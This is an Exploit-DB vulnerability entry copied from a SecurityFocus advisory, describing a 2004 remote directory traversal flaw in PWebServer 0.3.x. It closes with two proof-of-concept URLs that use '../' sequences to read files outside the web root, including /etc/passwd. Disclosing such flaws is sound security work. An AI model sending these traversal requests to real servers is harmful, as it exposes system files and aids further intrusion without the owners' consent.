PWebServer 0.3.x - Directory Traversal

EDB-ID:

23794




Platform:

Linux

Date:

2004-03-08


source: https://www.securityfocus.com/bid/9817/info

It has been reported that PWebServer is prone to a remote directory traversal vulnerability. This issue is due to a failure of the server process to properly filter user supplied URI requests.

Information acquired by exploiting this issue may be used to aid further attacks against a vulnerable system.

http://www.example.com:6789/../someFile
http://www.example.com:6789/../../../../etc/passwd